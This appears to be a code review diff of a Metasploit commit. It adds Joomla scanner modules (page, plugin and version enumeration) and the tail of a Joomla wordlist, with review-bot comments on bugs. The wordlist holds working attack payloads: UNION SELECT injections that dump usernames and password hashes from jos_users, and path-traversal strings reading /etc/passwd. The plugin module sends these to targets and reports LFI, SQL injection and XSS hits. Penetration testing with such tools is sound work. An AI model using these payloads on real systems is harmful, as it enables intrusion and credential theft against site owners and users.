|
||||||
|
index.php?option=com_szallasok&mode=8&id=25 (SQL)
|
||||||
|
index.php?option=com_tag&task=tag&tag=
|
||||||
|
index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
|
||||||
|
index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users
|
||||||
|
index.php?option=com_ultimateportfolio&controller=
|
||||||
|
index.php?option=com_users&view=registration
|
||||||
|
index.php?option=com_virtuemart&page=account.index&keyword=[sqli]
|
||||||
|
index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
|
||||||
|
index.php?option=com_x-shop&action=artdetail&idd='
|
||||||
|
index.php?option=com_x-shop&action=artdetail&idd='[SQLi]
|
||||||
|
index.php?option=com_xcomp&controller=../../[LFI]%00
|
||||||
|
index.php?option=com_xvs&controller=../../[LFI]%00
|
||||||
|
index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users--
|
||||||
|
index.php?option=com_yjcontactus&view=
|
||||||
|
index.php?option=com_youtube&id_cate=4
|
||||||
|
index.php?option=com_zina&view=zina&Itemid=9
|
||||||
|
index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=
|
||||||
|
index.php?search=NoGe&option=com_esearch&searchId=
|
||||||
|
index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
|
||||||
|
index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--
|
||||||
|
js/index.php?option=com_socialads&view=showad&Itemid=94
|
||||||
|
libraries/joomla/utilities/compat/php50x.php
|
||||||
|
libraries/pcl/pcltar.php
|
||||||
|
libraries/phpmailer/phpmailer.php
|
||||||
|
libraries/phpxmlrpc/xmlrpcs.php
|
||||||
|
modules/mod_artuploader/upload.php");
|
||||||
|
modules/mod_as_category.php
|
||||||
|
modules/mod_calendar.php
|
||||||
|
modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]
|
||||||
|
modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream");
|
||||||
|
modules/mod_jfancy/script.php");
|
||||||
|
modules/mod_ppc_simple_spotlight/elements/upload_file.php
|
||||||
|
modules/mod_ppc_simple_spotlight/img/
|
||||||
|
modules/mod_pxt/
|
||||||
|
modules/mod_quick_question.php
|
||||||
|
modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0
|
||||||
|
patch/makedown.php?arquivo=../../../../etc/passwd
|
||||||
|
plugins/content/efup_files/helper.php");
|
||||||
|
plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data">
|
||||||
|
plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
|
||||||
|
plugins/editors/xstandard/attachmentlibrary.php
|
||||||
|
print.php?task=person&id=36 and 1=1
|
||||||
|
templates/be2004-2/
|
||||||
|
templates/ja_purity/
|
||||||
|
wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
|
||||||
|
web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
|
|
@ -0,0 +1,109 @@
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/
|
||||||
|
##
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Auxiliary::Scanner
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
|
||||||
|
# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to
|
||||||
|
# Joomscan and various MSF modules for code examples.
|
||||||
|
def initialize
|
||||||
|
super(
|
||||||
|
'Name' => 'Joomla Version Scanner',
|
||||||
|
'Description' => %q{
|
||||||
|
This module scans a Joomla install for common pages.
|
||||||
|
},
|
||||||
|
'Author' => [ 'newpid0' ],
|
||||||
|
'License' => MSF_LICENSE
|
||||||
|
)
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/'])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def peer
|
||||||
|
return "#{rhost}:#{rport}"
|
||||||
|
end
|
||||||
|
|
||||||
|
def run_host(ip)
|
||||||
|
tpath = normalize_uri(target_uri.path)
|
||||||
|
if tpath[-1,1] != '/'
|
||||||
|
tpath += '/'
|
||||||
|
end
|
||||||
|
|
||||||
|
pages = [
|
||||||
|
'robots.txt',
|
||||||
|
'administrator/index.php',
|
||||||
|
'admin/',
|
||||||
|
'index.php/using-joomla/extensions/components/users-component/registration-form',
|
||||||
|
'index.php/component/users/?view=registration',
|
||||||
|
'htaccess.txt'
|
||||||
|
]
|
||||||
|
|
||||||
|
vprint_status("#{peer} - Checking for interesting pages")
|
||||||
|
pages.each do |page|
|
||||||
|
scan_pages(tpath, page, ip)
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
def scan_pages(tpath, page, ip)
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => "#{tpath}#{page}",
|
||||||
|
'method' => 'GET',
|
||||||
|
})
|
||||||
|
return if not res or not res.body or not res.code
|
||||||
|
res.body.gsub!(/[\r|\n]/, ' ')
|
||||||
|
|
||||||
|
if (res.code == 200)
|
||||||
|
note = "Page Found"
|
||||||
|
if (res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/)
|
||||||
|
note = "Administrator Login Page"
|
||||||
|
elsif (res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/)
|
||||||
|
note = "Registration Page"
|
||||||
|
end
|
||||||
|
|
||||||
|
print_good("#{peer} - #{note}: #{tpath}#{page}")
|
||||||
|
|
||||||
|
report_note(
|
||||||
|
:host => ip,
|
||||||
|
:port => datastore['RPORT'],
|
||||||
|
:proto => 'http',
|
||||||
|
:ntype => 'joomla_page',
|
||||||
|
:data => "#{note}: #{tpath}#{page}",
|
||||||
|
:update => :unique_data
|
||||||
|
)
|
||||||
|
elsif (res.code == 403)
|
||||||
|
if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
|
||||||
|
vprint_status("#{ip} denied access to #{ip} (SSL Required)")
|
||||||
|
elsif (res.body =~ /has a list of IP addresses that are not allowed/)
|
||||||
|
vprint_status("#{ip} restricted access by IP")
|
||||||
|
elsif (res.body =~ /SSL client certificate is required/)
|
||||||
|
vprint_status("#{ip} requires a SSL client certificate")
|
||||||
|
else
|
||||||
|
vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
return
|
||||||
|
|
||||||
|
rescue OpenSSL::SSL::SSLError
|
||||||
|
vprint_error("#{peer} - SSL error")
|
||||||
|
return
|
||||||
|
rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
|
||||||
|
vprint_error("#{peer} - Unable to Connect")
|
||||||
|
return
|
||||||
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||||
|
vprint_error("#{peer} - Timeout error")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
end
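Review bot: The `'Name'` set in `initialize` is `'Joomla Version Scanner'`, the same string the version module later in this commit uses, while the description says this module looks for common pages; `'Name' => 'Joomla Page Scanner'` would keep the two apart in module search and in reports. In `scan_pages`, `res.body.gsub!(/[\r|\n]/, ' ')` also replaces literal `|` characters, because `|` is not alternation inside a character class; `/[\r\n]/` is what was meant, and the same line appears in `run_host` and `plugin_search` of the plugins module and in `check_file` of the version module. Every 200 response is stored through `report_note` as "Page Found", so a host that answers 200 for unknown paths gets a note for all six entries; comparing against a request for a path that cannot exist would filter that out. The 403 messages interpolate `#{ip}` twice (`"#{ip} denied access to #{ip} (SSL Required)"`) where the second value was presumably meant to be `#{tpath}#{page}`.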
|
|
@ -0,0 +1,175 @@
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/
|
||||||
|
##
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Auxiliary::Scanner
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
|
||||||
|
# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to
|
||||||
|
# Joomscan and various MSF modules for code examples.
|
||||||
|
def initialize
|
||||||
|
super(
|
||||||
|
'Name' => 'Joomla Plugins Scanner',
|
||||||
|
'Description' => %q{
|
||||||
|
This module scans a Joomla install for plugins and potential
|
||||||
|
vulnerabilities.
|
||||||
|
},
|
||||||
|
'Author' => [ 'newpid0' ],
|
||||||
|
'License' => MSF_LICENSE
|
||||||
|
)
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']),
|
||||||
|
OptPath.new('PLUGINS', [ true, "Path to list of plugins to enumerate", File.join(Msf::Config.install_root, "data", "wordlists", "joomla.txt")])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def peer
|
||||||
|
return "#{rhost}:#{rport}"
|
||||||
|
end
|
||||||
|
|
||||||
|
def run_host(ip)
|
||||||
|
tpath = normalize_uri(target_uri.path)
|
||||||
|
if tpath[-1,1] != '/'
|
||||||
|
tpath += '/'
|
||||||
|
end
|
||||||
|
|
||||||
|
vprint_status("#{peer} - Checking for interesting plugins")
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => tpath,
|
||||||
|
'method' => 'GET'
|
||||||
|
})
|
||||||
|
return if res.nil?
|
||||||
|
|
||||||
|
res.body.gsub!(/[\r|\n]/, ' ')
|
||||||
|
File.open(datastore['PLUGINS'], 'rb').each_line do |line|
|
||||||
|
papp = line.chomp
|
||||||
|
plugin_search(tpath, papp, ip, res.body.size)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def plugin_search(tpath, papp, ip, osize)
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => "#{tpath}#{papp}",
|
||||||
|
'method' => 'GET'
|
||||||
|
})
|
||||||
|
return if res.nil?
|
||||||
|
|
||||||
|
res.body.gsub!(/[\r|\n]/, ' ')
|
||||||
|
nsize = res.body.size
|
||||||
|
|
||||||
|
if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! Administration Login<\/h1>/ and osize != nsize)
|
||||||
|
print_good("#{peer} - Plugin: #{tpath}#{papp} ")
|
||||||
|
report_note(
|
||||||
|
:host => ip,
|
||||||
|
:port => rport,
|
||||||
|
:proto => 'http',
|
||||||
|
:ntype => 'joomla_plugin',
|
||||||
|
:data => "#{tpath}#{papp}",
|
||||||
|
:update => :unique_data
|
||||||
|
)
|
||||||
|
|
||||||
|
if (papp =~/passwd/ and res.body =~/root/)
|
||||||
|
print_good("#{peer} - Vulnerability: Potential LFI")
|
||||||
|
report_web_vuln(
|
||||||
|
:host => ip,
|
||||||
|
:port => rport,
|
||||||
|
:vhost => vhost,
|
||||||
|
:ssl => ssl,
|
||||||
|
:path => tpath,
|
||||||
|
:method => "GET",
|
||||||
|
:pname => "",
|
||||||
|
:proof => "Response with code #{res.code} contains the 'root' signature",
|
||||||
|
:risk => 1,
|
||||||
|
:confidence => 10,
|
||||||
|
:category => 'Local File Inclusion',
|
||||||
|
:description => "Joomla: Potential LFI at #{tpath}#{papp}",
|
||||||
|
:name => 'Local File Inclusion'
|
||||||
|
)
|
||||||
|
elsif (res.body =~/SQL syntax/)
|
||||||
|
print_good("#{peer} - Vulnerability: Potential SQL Injection")
|
||||||
|
report_web_vuln(
|
||||||
|
:host => ip,
|
||||||
|
:port => rport,
|
||||||
|
:vhost => vhost,
|
||||||
|
:ssl => ssl,
|
||||||
|
:path => tpath,
|
||||||
|
:method => "GET",
|
||||||
|
:pname => "",
|
||||||
|
:proof => "Response with code #{res.code} contains the 'SQL syntax' signature",
|
||||||
|
:risk => 1,
|
||||||
|
:confidence => 10,
|
||||||
|
:category => 'SQL Injection',
|
||||||
|
:description => "Joomla: Potential SQLI at #{tpath}#{papp}",
|
||||||
|
:name => 'SQL Injection'
|
||||||
|
)
|
||||||
|
elsif (papp =~/>alert/ and res.body =~/>alert/)
|
||||||
|
print_good("#{peer} - Vulnerability: Potential XSS")
|
||||||
|
report_web_vuln(
|
||||||
|
:host => ip,
|
||||||
|
:port => rport,
|
||||||
|
:vhost => vhost,
|
||||||
|
:ssl => ssl,
|
||||||
|
:path => tpath,
|
||||||
|
:method => "GET",
|
||||||
|
:pname => "",
|
||||||
|
:proof => "Response with code #{res.code} contains the '>alert' signature",
|
||||||
|
:risk => 1,
|
||||||
|
:confidence => 10,
|
||||||
|
:category => 'Cross Site Scripting',
|
||||||
|
:description => "Joomla: Potential XSS at #{tpath}#{papp}",
|
||||||
|
:name => 'Cross Site Scripting'
|
||||||
|
)
|
||||||
|
elsif (papp =~/com_/)
|
||||||
|
vars = papp.split('_')
|
||||||
|
pages = vars[1].gsub('/','')
|
||||||
|
res1 = send_request_cgi({
|
||||||
|
'uri' => "#{tpath}index.php?option=com_#{pages}",
|
||||||
|
'method' => 'GET'
|
||||||
|
})
|
||||||
|
if (res1.code == 200)
|
||||||
|
print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}")
|
||||||
|
report_note(
|
||||||
|
:host => ip,
|
||||||
|
:port => datastore['RPORT'],
|
||||||
|
:proto => 'http',
|
||||||
|
:ntype => 'joomla_page',
|
||||||
|
:data => "Page: #{tpath}index.php?option=com_#{pages}",
|
||||||
|
:update => :unique_data
|
||||||
|
)
|
||||||
|
else
|
||||||
|
vprint_error("#{peer} - Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
elsif (res.code == 403)
|
||||||
|
if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
|
||||||
|
vprint_status("#{ip} ip access to #{ip} (SSL Required)")
|
||||||
|
elsif (res.body =~ /has a list of IP addresses that are not allowed/)
|
||||||
|
vprint_status("#{ip} restricted access by IP")
|
||||||
|
elsif (res.body =~ /SSL client certificate is required/)
|
||||||
|
vprint_status("#{ip} requires a SSL client certificate")
|
||||||
|
else
|
||||||
|
vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
return
|
||||||
|
|
||||||
|
rescue OpenSSL::SSL::SSLError
|
||||||
|
vprint_error("#{peer} - SSL error")
|
||||||
|
return
|
||||||
|
rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
|
||||||
|
vprint_error("#{peer} - Unable to Connect")
|
||||||
|
return
|
||||||
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||||
|
vprint_error("#{peer} - Timeout error")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
end
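Review bot: In `plugin_search`, the follow-up response in the `com_` branch is dereferenced without a nil check, so `if (res1.code == 200)` raises NoMethodError whenever `send_request_cgi` returns nil (the earlier `return if res.nil?` guards show that it can), and none of the `rescue` clauses cover that. Adding `return if res1.nil?` before that `if` is enough, since only the final `return` follows the branch. The LFI check `res.body =~/root/` is loose for a finding stored with `:confidence => 10`, because any page containing the word "root" matches; a passwd-shaped pattern such as `res.body =~ /root:.*:0:0:/` would cut false positives, and `:path => tpath` should probably be `"#{tpath}#{papp}"` so the recorded finding points at the request that triggered it. `vars = papp.split('_')` followed by `vars[1]` truncates component names that contain an underscore (the wordlist has `com_joomla_flash_uploader`, which becomes `com_joomla`); `papp[/com_([^\/&]+)/, 1]` keeps the full name. `run_host` also never closes the handle from `File.open(datastore['PLUGINS'], 'rb')`; the block form of `File.open` closes it.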
|
|
@ -0,0 +1,176 @@
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/
|
||||||
|
##
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Auxiliary::Scanner
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
|
||||||
|
# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to
|
||||||
|
# Joomscan and various MSF modules for code examples.
|
||||||
|
def initialize
|
||||||
|
super(
|
||||||
|
'Name' => 'Joomla Version Scanner',
|
||||||
|
'Description' => %q{
|
||||||
|
This module scans a Joomla install for information about the underlying
|
||||||
|
operating system and Joomla version.
|
||||||
|
},
|
||||||
|
'Author' => [ 'newpid0' ],
|
||||||
|
'License' => MSF_LICENSE
|
||||||
|
)
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/'])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def peer
|
||||||
|
return "#{rhost}:#{rport}"
|
||||||
|
end
|
||||||
|
|
||||||
|
def os_fingerprint(response)
|
||||||
|
if not response.headers.has_key?('Server')
|
||||||
|
return "Unkown OS (No Server Header)"
|
||||||
|
end
|
||||||
|
|
||||||
|
case response.headers['Server']
|
||||||
|
when /Win32/
|
||||||
|
when /\(Windows/
|
||||||
|
when /IIS/
|
||||||
|
os = "Windows"
|
||||||
|
when /Apache\//
|
||||||
|
os = "*Nix"
|
||||||
|
else
|
||||||
|
os = "Unknown Server Header Reporting: "+response.headers['Server']
|
||||||
|
end
|
||||||
|
return os
|
||||||
|
end
|
||||||
|
|
||||||
|
def fingerprint(response)
|
||||||
|
case response.body
|
||||||
|
when /<version.*\/?>(.+)<\/version\/?>/i
|
||||||
|
v = $1
|
||||||
|
out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}"
|
||||||
|
when /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/
|
||||||
|
when /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/
|
||||||
|
when /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/
|
||||||
|
when /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/
|
||||||
|
when /20196 2011\-01\-09 02\:40\:25Z ian/
|
||||||
|
out = "1.6"
|
||||||
|
when /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley /
|
||||||
|
when /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/
|
||||||
|
when /22183 2011\-09\-30 09\:04\:32Z infograf768/
|
||||||
|
when /21660 2011\-06\-23 13\:25\:32Z infograf768/
|
||||||
|
out = "1.7"
|
||||||
|
when /Joomla! 1.5/
|
||||||
|
when /MooTools\=\{version\:\'1\.12\'\}/
|
||||||
|
when /11391 2009\-01\-04 13\:35\:50Z ian/
|
||||||
|
out = "1.5"
|
||||||
|
when /Copyright \(C\) 2005 \- 2012 Open Source Matters/
|
||||||
|
when /MooTools.More\=\{version\:\"1\.4\.0\.1\"/
|
||||||
|
out = "2.5"
|
||||||
|
when /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/
|
||||||
|
out = $1.split(/,/)[0]
|
||||||
|
when /(Copyright \(C\) 2005 - 200(6|7))/
|
||||||
|
when /47 2005\-09\-15 02\:55\:27Z rhuk/
|
||||||
|
when /423 2005\-10\-09 18\:23\:50Z stingrey/
|
||||||
|
when /1005 2005\-11\-13 17\:33\:59Z stingrey/
|
||||||
|
when /1570 2005\-12\-29 05\:53\:33Z eddieajau/
|
||||||
|
when /2368 2006\-02\-14 17\:40\:02Z stingrey/
|
||||||
|
when /4085 2006\-06\-21 16\:03\:54Z stingrey/
|
||||||
|
when /4756 2006\-08\-25 16\:07\:11Z stingrey/
|
||||||
|
when /5973 2006\-12\-11 01\:26\:33Z robs/
|
||||||
|
when /5975 2006\-12\-11 01\:26\:33Z robs/
|
||||||
|
out = "1.0"
|
||||||
|
else
|
||||||
|
out = 'Unknown Joomla'
|
||||||
|
end
|
||||||
|
return out
|
||||||
|
end
|
||||||
|
|
||||||
|
def check_file(tpath, file, ip)
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => "#{tpath}#{file}",
|
||||||
|
'method' => 'GET'
|
||||||
|
})
|
||||||
|
|
||||||
|
return :abort if res.nil?
|
||||||
|
|
||||||
|
res.body.gsub!(/[\r|\n]/, ' ')
|
||||||
|
|
||||||
|
if (res.code == 200)
|
||||||
|
os = os_fingerprint(res)
|
||||||
|
out = fingerprint(res)
|
||||||
|
return false if not out
|
||||||
|
|
||||||
|
if(out =~ /Unknown Joomla/)
|
||||||
|
print_error("#{peer} - Unable to identify Joomla Version with #{file}")
|
||||||
|
return false
|
||||||
|
else
|
||||||
|
print_good("#{peer} - Joomla Version:#{out} from: #{file} ")
|
||||||
|
print_good("#{peer} - OS: #{os}")
|
||||||
|
report_note(
|
||||||
|
:host => ip,
|
||||||
|
:port => datastore['RPORT'],
|
||||||
|
:proto => 'http',
|
||||||
|
:ntype => 'joomla_version',
|
||||||
|
:data => out
|
||||||
|
)
|
||||||
|
return true
|
||||||
|
end
|
||||||
|
elsif (res.code == 403)
|
||||||
|
if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
|
||||||
|
vprint_status("#{ip} denied access to #{ip} (SSL Required)")
|
||||||
|
elsif(res.body =~ /has a list of IP addresses that are not allowed/)
|
||||||
|
vprint_status("#{ip} restricted access by IP")
|
||||||
|
elsif(res.body =~ /SSL client certificate is required/)
|
||||||
|
vprint_status("#{ip} requires a SSL client certificate")
|
||||||
|
else
|
||||||
|
vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}")
|
||||||
|
end
|
||||||
|
return :abort
|
||||||
|
end
|
||||||
|
|
||||||
|
return false
|
||||||
|
|
||||||
|
rescue OpenSSL::SSL::SSLError
|
||||||
|
vprint_error("#{peer} - SSL error")
|
||||||
|
return :abort
|
||||||
|
rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
|
||||||
|
vprint_error("#{peer} - Unable to Connect")
|
||||||
|
return :abort
|
||||||
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||||
|
vprint_error("#{peer} - Timeout error")
|
||||||
|
return :abort
|
||||||
|
end
|
||||||
|
|
||||||
|
def run_host(ip)
|
||||||
|
tpath = normalize_uri(target_uri.path)
|
||||||
|
if tpath[-1,1] != '/'
|
||||||
|
tpath += '/'
|
||||||
|
end
|
||||||
|
|
||||||
|
files = [
|
||||||
|
'language/en-GB/en-GB.xml',
|
||||||
|
'templates/system/css/system.css',
|
||||||
|
'media/system/js/mootools-more.js',
|
||||||
|
'language/en-GB/en-GB.ini',
|
||||||
|
'htaccess.txt',
|
||||||
|
'language/en-GB/en-GB.com_media.ini'
|
||||||
|
]
|
||||||
|
|
||||||
|
vprint_status("#{peer} - Checking Joomla version")
|
||||||
|
files.each do |file|
|
||||||
|
joomla_found = check_file(tpath, file, ip)
|
||||||
|
return if joomla_found == :abort
|
||||||
|
break if joomla_found
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
end
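Review bot: Most signatures in `os_fingerprint` and `fingerprint` can never produce a result, because Ruby's `case` does not fall through: a `when` with an empty body evaluates to nil, so only the last pattern of each group sets `os` or `out`. A `Server` header matching `/Win32/` therefore prints an empty OS, and a body matching, for example, the `system.css 20196` signature leaves `out` nil, which `check_file` turns into `return false if not out`. Listing the patterns of a group on one `when`, separated by commas, gives the intended behaviour; the rewritten groups are below. Separately, `"Unkown OS (No Server Header)"` has a typo in a user-visible string.

```ruby
case response.headers['Server']
when /Win32/, /\(Windows/, /IIS/
  os = "Windows"
# … unchanged: Apache and else branches …

case response.body
# … unchanged: <version> tag branch …
when /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/,
     /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/,
     /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/,
     /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/,
     /20196 2011\-01\-09 02\:40\:25Z ian/
  out = "1.6"
when /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley /,
     /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/,
     /22183 2011\-09\-30 09\:04\:32Z infograf768/,
     /21660 2011\-06\-23 13\:25\:32Z infograf768/
  out = "1.7"
when /Joomla! 1.5/,
     /MooTools\=\{version\:\'1\.12\'\}/,
     /11391 2009\-01\-04 13\:35\:50Z ian/
  out = "1.5"
when /Copyright \(C\) 2005 \- 2012 Open Source Matters/,
     /MooTools.More\=\{version\:\"1\.4\.0\.1\"/
  out = "2.5"
# … unchanged: meta Keywords branch …
when /(Copyright \(C\) 2005 - 200(6|7))/,
     /47 2005\-09\-15 02\:55\:27Z rhuk/,
     /423 2005\-10\-09 18\:23\:50Z stingrey/,
     /1005 2005\-11\-13 17\:33\:59Z stingrey/,
     /1570 2005\-12\-29 05\:53\:33Z eddieajau/,
     /2368 2006\-02\-14 17\:40\:02Z stingrey/,
     /4085 2006\-06\-21 16\:03\:54Z stingrey/,
     /4756 2006\-08\-25 16\:07\:11Z stingrey/,
     /5973 2006\-12\-11 01\:26\:33Z robs/,
     /5975 2006\-12\-11 01\:26\:33Z robs/
  out = "1.0"
# … unchanged: else branch and return …
```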
|